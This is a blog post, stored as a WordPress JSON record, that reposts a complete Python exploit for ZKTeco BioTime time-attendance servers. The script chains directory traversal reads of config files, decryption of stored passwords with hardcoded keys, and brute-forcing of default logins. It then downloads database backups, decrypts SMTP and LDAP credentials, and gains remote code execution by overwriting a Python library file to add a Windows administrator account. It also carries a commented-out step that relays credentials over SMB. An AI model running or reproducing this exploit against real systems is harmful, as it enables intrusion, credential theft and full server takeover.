{"id":55763,"date":"2024-04-01T19:32:27","date_gmt":"2024-04-01T15:32:27","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177859\/biotime901-exec.txt"},"modified":"2024-04-02T13:09:30","modified_gmt":"2024-04-02T08:39:30","slug":"biotime-directory-traversal-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/biotime-directory-traversal-remote-code-execution\/","title":{"rendered":"BioTime Directory Traversal \/ Remote Code Execution"},"content":{"rendered":"

# __________.__ ___________.__
\n# \\______ \\__| ___\\__ ___\/|__| _____ ____
\n# | | _\/ |\/ _ \\| | | |\/ \\_\/ __ \\
\n# | | \\ ( <_> ) | | | Y Y \\ ___\/
\n# |______ \/__|\\____\/|____| |__|__|_| \/\\___ >
\n# \\\/ \\\/ \\\/
\n# Tested on 8.5.5 (Build:20231103.R1905)
\n# Tested on 9.0.1 (Build:20240108.18753)
\n# BioTime, “time” for shellz!
\n# https:\/\/claroty.com\/team82\/disclosure-dashboard\/cve-2023-38952
\n# https:\/\/claroty.com\/team82\/disclosure-dashboard\/cve-2023-38951
\n# https:\/\/claroty.com\/team82\/disclosure-dashboard\/cve-2023-38950
\n# RCE by adding a user to the system, not the app.
\n# Relay machine creds over smb, while creating a backup
\n# Decrypt SMTP, LDAP or SFTP creds, if any.
\n# Get sql backup. Good luck cracking those hashes!
\n# Can use Banner to determine which version is running
\n# Server: Apache\/2.4.29 (Win64) mod_wsgi\/4.5.24 Python\/2.7
\n# Server: Apache\/2.4.52 (Win64) mod_wsgi\/4.7.1 Python\/3.7
\n# Server: Apache\/2.4.48 (Win64) mod_wsgi\/4.7.1 Python\/3.7
\n# Server: Apache => BioTime Version 9
\n# @w3bd3vil – Krash Consulting (https:\/\/krashconsulting.com\/fury-of-fingers-biotime-rce\/)
\nimport requests
\nfrom bs4 import BeautifulSoup
\nimport os
\nimport json
\nimport sys
\nfrom Crypto.Cipher import AES
\nfrom Crypto.Cipher import ARC4
\nimport base64
\nfrom binascii import b2a_hex, a2b_hex<\/p>\n

requests.packages.urllib3.disable_warnings()<\/p>\n

proxies = {
\n‘http’: ‘http:\/\/127.0.0.1:8080’, # Proxy for HTTP traffic
\n‘https’: ‘http:\/\/127.0.0.1:8080′ # Proxy for HTTPS traffic
\n}
\nproxies = {}<\/p>\n

target = sys.argv[1]\n

def decrypt_rc4(base64_encoded_rc4, password=”biotime”):
\nencrypted_data = base64.b64decode(base64_encoded_rc4)
\ncipher = ARC4.new(password.encode())
\ndecrypted_data = cipher.decrypt(encrypted_data)
\nreturn decrypted_data.decode()<\/p>\n

# base64_encoded_rc4 = “fj8xD5fAY6r6s3I=”
\n# password = “biotime”<\/p>\n

# decrypted_data = decrypt_rc4(base64_encoded_rc4, password)
\n# print(“Decrypted data:”, decrypted_data)<\/p>\n

AES_PASSWORD = b’china@2018encryption#aes’
\nAES_IV = b’zkteco@china2019′<\/p>\n

def filling_data(data, restore=False):
\n”’
\n:param data: str
\n:return: str
\n”’
\nif restore:
\nreturn data[0:-ord(data[-1])]\nblock_size = AES.block_size # Use AES.block_size instead of None.block_size
\nreturn data + (block_size – len(data) % block_size) * chr(block_size – len(data) % block_size)<\/p>\n

def aes_encrypt(content):
\n”’
\nEncryption
\n:param content: str, The length of content must be times of AES.block_size, using filling_data to fill out
\n:return: str
\n”’
\nif isinstance(content, bytes):
\ncontent = str(content, ‘utf-8’)
\ncipher = AES.new(AES_PASSWORD, AES.MODE_CBC, AES_IV)
\nencrypted = cipher.encrypt(filling_data(content).encode(‘utf-8’))
\nresult = b2a_hex(encrypted).decode(‘utf-8′)
\nreturn result<\/p>\n

def aes_decrypt(content):
\n”’
\nDecryption
\n:param content: str or bytes, Encryption string
\n:return: str
\n”’
\nif isinstance(content, str):
\ncontent = content.encode(‘utf-8’)
\ncipher = AES.new(AES_PASSWORD, AES.MODE_CBC, AES_IV)
\nresult = cipher.decrypt(a2b_hex(content)).decode(‘utf-8′)
\nreturn filling_data(result, restore=True)<\/p>\n

#Check BioTime
\nurl = f'{target}\/license\/’
\nresponse = requests.get(url, proxies=proxies, verify=False)
\nhtml_content = response.content<\/p>\n

soup = BeautifulSoup(html_content, ‘html.parser’)
\nbuild_lines = [line.strip() for line in soup.get_text().split(‘\\n’) if ‘build’ in line.lower()]\n

build = None
\nfor line in build_lines:
\nbuild = line
\nprint(f”Found BioTime: {line}”)
\nbreak<\/p>\n

if build != None:
\nbuildNumber = build[0]\nelse:
\nprint(“Unsupported Target!”)
\nsys.exit(1)<\/p>\n

# Dir Traversal
\nurl = f'{target}\/iclock\/file?SN=win&url=\/..\/..\/..\/..\/..\/..\/..\/..\/windows\/win.ini’
\nresponse = requests.get(url, proxies=proxies, verify=False)
\ntry:
\nprint(“Dir Traversal Attempt\\nOutput of windows\/win.ini file:”)
\nprint(base64.b64decode(response.text).decode(‘utf-8′))
\ntry:
\nurl = f'{target}\/iclock\/file?SN=att&url=\/..\/..\/..\/..\/..\/..\/..\/..\/biotime\/attsite.ini’
\nresponse = requests.get(url, proxies=proxies, verify=False)
\nattConfig = base64.b64decode(response.text).decode(‘utf-8′)
\n#print(f”Output of BioTime config file: {attConfig}”)
\nexcept:
\ntry:
\nurl = f'{target}\/iclock\/file?SN=att&url=\/..\/..\/..\/..\/..\/..\/..\/..\/zkbiotime\/attsite.ini’
\nresponse = requests.get(url, proxies=proxies, verify=False)
\nattConfig = base64.b64decode(response.text).decode(‘utf-8’)
\n#print(f”Output of BioTime config file: {attConfig}”)
\nexcept:
\nprint(“Couldn’t get BioTime config file (possibly non default configuration)”)
\nlines = attConfig.split(‘\\n’)<\/p>\n

for i, line in enumerate(lines):
\nif “PASSWORD=@!@=” in line:
\ndec_att = decrypt_rc4(lines[i].split(“@!@=”)[1])
\nlines[i] = lines[i].split(“@!@=”)[0]+dec_att
\nattConfig_modified = ‘\\n’.join(lines)
\nprint(f”Output of BioTime Decrypted config file:\\n{attConfig_modified}”)
\nexcept:
\nprint(“Couldn’t exploit Dir Traversal”)<\/p>\n

# Extract Cookies
\nurl = f'{target}\/login\/’<\/p>\n

response = requests.get(url, proxies=proxies, verify=False)<\/p>\n

if response.status_code == 200:
\nsoup = BeautifulSoup(response.text, ‘html.parser’)<\/p>\n

csrf_token_header = soup.find(‘input’, {‘name’: ‘csrfmiddlewaretoken’})
\nif csrf_token_header:
\ncsrf_token_header_value = csrf_token_header[‘value’]\nprint(f”CSRF Token Header: {csrf_token_header_value}”)<\/p>\n

session_id_cookie = response.cookies.get(‘sessionid’)
\nif session_id_cookie:
\nprint(f”Session ID: {session_id_cookie}”)<\/p>\n

csrf_token_value = response.cookies.get(‘csrftoken’)
\nif csrf_token_value:
\nprint(f”CSRF Token Cookie: {csrf_token_value}”)
\nelse:
\nprint(f”Failed to retrieve data from {url}. Status code: {response.status_code}”)<\/p>\n

# Login Now!
\ncookies = {
\n‘sessionid’: session_id_cookie,
\n‘csrftoken’: csrf_token_value
\n}<\/p>\n

for i in range(1,10):
\nusername = i
\npassword = ‘123456’ # Deafult password!<\/p>\n

data = {
\n‘username’: username,
\n‘password’: password,
\n‘captcha’:”,
\n‘login_user’:’employee’
\n}<\/p>\n

headers = {
\n‘User-Agent’: ‘Krash Consulting’,
\n‘X-CSRFToken’: csrf_token_header_value
\n}<\/p>\n

response = requests.post(url, data=data, cookies=cookies, headers=headers, proxies=proxies, verify=False)<\/p>\n

if response.status_code == 200:
\njson_response = response.json()
\nret_value = json_response.get(‘ret’)
\nif ret_value == 0:
\nprint(f”Valid Credentials found: Username is {username} and password is {password}”)
\nsession_id_cookie = response.cookies.get(‘sessionid’)
\nif session_id_cookie:
\nprint(f”Auth Session ID: {session_id_cookie}”)<\/p>\n

csrf_token_value = response.cookies.get(‘csrftoken’)
\nif csrf_token_value:
\nprint(f”Auth CSRF Token Cookie: {csrf_token_value}”)
\nbreak<\/p>\n

if i == 9:
\nprint(“No valid users found!”)
\nsys.exit(1)<\/p>\n

# Check for Backups
\ndef downloadBackup():
\nurl = f'{target}\/base\/dbbackuplog\/table\/?page=1&limit=33′
\ncookies = {
\n‘sessionid’: session_id_cookie,
\n‘csrftoken’: csrf_token_value
\n}<\/p>\n

response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)
\nresponse_data = response.json()
\nprint(“Backup files list”)
\nprint(json.dumps(response_data, indent=4))<\/p>\n

if response_data[‘count’] > 0:
\nbackup_info = response_data[‘data’][0] # Latest Backup
\noperator_name = backup_info[‘operator’]\nbackup_file = backup_info[‘backup_file’]\ndb_type = backup_info[‘db_type’]\n

print(“Operator:”, operator_name)
\nprint(“Backup File:”, backup_file)
\nprint(“Database Type:”, db_type)<\/p>\n

if buildNumber == “9”:
\ncreateBackup()
\nprint(“Backup File password: Krash”)<\/p>\n

#download = os.path.basename(backup_file)<\/p>\n

path = os.path.normpath(backup_file)
\ntry:
\nsplit_path = path.split(os.sep)
\nfiles_index = split_path.index(‘files’)
\nrelative_path = ‘\/’.join(split_path[files_index + 1:])
\nexcept:
\nreturn False<\/p>\n

url = f'{target}\/files\/{relative_path}’
\nprint(url)
\nresponse = requests.get(url, proxies=proxies, verify=False)
\nif response.status_code == 200:
\nfilename = os.path.basename(url)
\nwith open(filename, ‘wb’) as file:
\nfile.write(response.content)
\nprint(f”File ‘{filename}’ downloaded successfully.”)
\nelse:
\nprint(“Failed to download the file. Status code:”, response.status_code)
\nreturn False
\nelse:
\nprint(“No backup Found!”)
\nreturn True<\/p>\n

def createBackup(targetPath=None):
\nprint(“Attempting to create backup.”)
\nurl = f'{target}\/base\/dbbackuplog\/action\/?action_name=44424261636b75704d616e75616c6c79&_popup=true&id=’
\ncookies = {
\n‘sessionid’: session_id_cookie,
\n‘csrftoken’: csrf_token_value
\n}
\nresponse = requests.get(url, cookies=cookies, proxies=proxies, verify=False)
\nhtml_content = response.content<\/p>\n

soup = BeautifulSoup(html_content, ‘html.parser’)
\npathBackup = [line.strip() for line in soup.get_text().split(‘\\n’) if ‘name=”file_path”‘ in line.lower()]\nprint(f”Possible backup location: {pathBackup}”)<\/p>\n

url = f'{target}\/base\/dbbackuplog\/action\/’<\/p>\n

if targetPath == None:
\nif buildNumber == “9” or build[:5] == “8.5.5”:
\ntargetPath = “C:\\\\ZKBioTime\\\\files\\\\backup\\\\”
\nelse:
\ntargetPath = “C:\\\\BioTime\\\\files\\\\fw\\\\”
\nif buildNumber == “9”:
\ndata = {
\n‘csrfmiddlewaretoken’: csrf_token_value,
\n‘file_path’:targetPath,
\n‘action_name’: ‘44424261636b75704d616e75616c6c79’,
\n‘backup_encryption_choices’: ‘2’,
\n‘auto_backup_password’: ‘Krash’
\n}
\nelse:
\ndata = {
\n‘csrfmiddlewaretoken’: csrf_token_value,
\n‘file_path’:targetPath,
\n‘action_name’: ‘44424261636b75704d616e75616c6c79′
\n}
\nresponse = requests.post(url, cookies=cookies, data=data, proxies=proxies, verify=False)
\nif response.status_code == 200:
\nprint(“Backup Initiated.”)
\nelse:
\nprint(“Backup failed!”)<\/p>\n

if downloadBackup():
\ncreateBackup()
\ndownloadBackup()<\/p>\n

url = f'{target}\/base\/api\/systemSettings\/email_setting\/’
\ncookies = {
\n‘sessionid’: session_id_cookie,
\n‘csrftoken’: csrf_token_value
\n}<\/p>\n

response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)
\nif response.status_code == 200:
\nresponse_data = response.json()
\nprint(“SMTP Settings”)
\nfor key in response_data:
\nif ‘password’ in key.lower():
\nvalue = response_data[key]\n#print(f'{key} decrypted value {aes_decrypt(value)}’)
\nresponse_data[key] = aes_decrypt(value)<\/p>\n

print(json.dumps(response_data, indent=4))<\/p>\n

url = f'{target}\/base\/api\/systemSettings\/ldap_setup\/’
\ncookies = {
\n‘sessionid’: session_id_cookie,
\n‘csrftoken’: csrf_token_value
\n}<\/p>\n

response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)
\nif response.status_code == 200:
\nresponse_data = response.json()
\nprint(“LDAP Settings”)
\nfor key in response_data:
\nif ‘password’ in key.lower():
\nvalue = response_data[key]\n#print(f'{key} decrypted value {aes_decrypt(value)}’)
\nresponse_data[key] = aes_decrypt(value)
\nprint(json.dumps(response_data, indent=4))<\/p>\n

def sftpRCE():
\nprint(“Attempting RCE!”)
\n#Add SFTP, Need valid IP\/credentials here!
\nprint(“Adding FTP List”)<\/p>\n

url = f'{target}\/base\/sftpsetting\/add\/’
\nmyIpaddr = ‘192.168.0.11’
\nmyUser = ‘test’
\nmyPassword = ‘test@123’<\/p>\n

cookies = {
\n‘sessionid’: session_id_cookie,
\n‘csrftoken’: csrf_token_value
\n}
\ndata = {
\n‘csrfmiddlewaretoken’: csrf_token_value,
\n‘host’:myIpaddr,
\n‘port’:22,
\n‘is_sftp’: 1,
\n‘user_name’:myUser,
\n‘user_password’:myPassword,
\n‘user_key’:”,
\n‘action_name’: ‘47656e6572616c416374696f6e4e6577′
\n}
\nresponse = requests.post(url, cookies=cookies, data=data, proxies=proxies, verify=False)
\nprint(response)<\/p>\n

url = f'{target}\/base\/sftpsetting\/table\/?page=1&limit=33’
\ncookies = {
\n‘sessionid’: session_id_cookie,
\n‘csrftoken’: csrf_token_value
\n}<\/p>\n

response = requests.get(url, cookies=cookies, proxies=proxies, verify=False)
\nresponse_data = response.json()
\nprint(“FTP List”)
\nprint(json.dumps(response_data, indent=4))<\/p>\n

backup_info = response_data[‘data’][0] # Latest SFTP
\ngetID = backup_info[‘id’]\n

if getID:
\nprint(“ID to edit “, getID)<\/p>\n

#Edit SFTP (Response can have errors, it doesn’t matter)
\nprint(“Editing SFTP Settings”)
\nif buildNumber == “9”:
\ndirTraverse = ‘\\..\\..\\..\\python311\\lib\\io.py’
\nelse:
\ndirTraverse = ‘\\..\\..\\..\\python37\\lib\\io.py’<\/p>\n

if len(dirTraverse) > 30:
\nprint(“Directory Traversal length is greater than 30, will not work!”)
\nsys.exit(1)<\/p>\n

url = f'{target}\/base\/sftpsetting\/edit\/’<\/p>\n

cookies = {
\n‘sessionid’: session_id_cookie,
\n‘csrftoken’: csrf_token_value
\n}
\ndata = {
\n‘csrfmiddlewaretoken’: csrf_token_value,
\n‘host’:myIpaddr,
\n‘port’:22,
\n‘is_sftp’: 1,
\n‘user_name’: dirTraverse,
\n‘user_password’:myPassword,
\n‘user_key’:’import os\\nos.system(“net user \/add omair190 KCP@ssw0rd && net localgroup administrators …’,
\n‘obj_id’: getID
\n}
\nresponse = requests.post(url, cookies=cookies, data=data, proxies=proxies, verify=False)
\nprint(“A new user should be added now on the server \\nusername: omair190\\npassword: KCP@ssw0rd”)<\/p>\n

#Delete SFTP
\nprint(“Deleting SFTP Settings”)
\nurl = f'{target}\/base\/sftpsetting\/action\/’<\/p>\n

cookies = {
\n‘sessionid’: session_id_cookie,
\n‘csrftoken’: csrf_token_value
\n}
\ndata = {
\n‘csrfmiddlewaretoken’: csrf_token_value,
\n‘id’: getID,
\n‘action_name’: ‘47656e6572616c416374696f6e44656c657465’
\n}
\nresponse = requests.post(url, cookies=cookies, data=data, proxies=proxies, verify=False)<\/p>\n

#RCE
\nif buildNumber == “9” or build[:5] == “8.5.5”:
\nsftpRCE()<\/p>\n

# #Relay Creds
\n# createBackup(“\\\\\\\\192.168.0.11\\\\KC\\\\test”)<\/p>\n","protected":false},"excerpt":{"rendered":"

# __________.__ ___________.__ # \\______ \\__| ___\\__ ___\/|__| _____ ____ # | | _\/ |\/ _ \\| | | |\/ \\_\/ __ \\ # | | \\ ( <_> ) | | | Y Y \\ ___\/ # |______ \/__|\\____\/|____| |__|__|_| \/\\___ > # \\\/ \\\/ \\\/ # Tested on 8.5.5 (Build:20231103.R1905) # Tested on …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55763","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55763","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55763"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55763\/revisions"}],"predecessor-version":[{"id":55775,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55763\/revisions\/55775"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55763"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55763"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55763"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}